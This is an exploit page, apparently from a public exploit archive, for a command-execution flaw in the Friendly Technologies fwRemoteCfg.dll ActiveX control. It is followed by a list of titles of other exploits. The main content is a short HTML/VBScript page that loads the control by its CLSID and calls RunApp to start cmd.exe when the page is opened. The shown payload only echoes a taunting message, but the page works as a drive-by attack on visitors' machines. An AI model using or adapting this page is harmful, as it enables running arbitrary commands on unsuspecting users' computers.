<!--
In addition to the overflow found in the "Friendly Technologies" dialers ActiveX,
Here is a "remote command execution" exploit.
Its so sad people dont actually Think...
Greetz to Binaryvision
======================
- http://www.binaryvision.org.il/
-- irc.nix.co.il/#binaryvision
--- written by spdr.
-->
<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>
lamers.RunApp "cmd" ,"cmd /k echo So Simple, So Lame -- Somebody should get fired." ,0
</script>
【Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit】相关文章:
★ tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
★ Joomla Component DT Register Remote SQL injection Vulnerability
★ Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
★ LoveCMS 1.6.2 Final Remote Code Execution Exploit
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
★ Dana IRC 1.4a Remote Buffer Overflow Exploit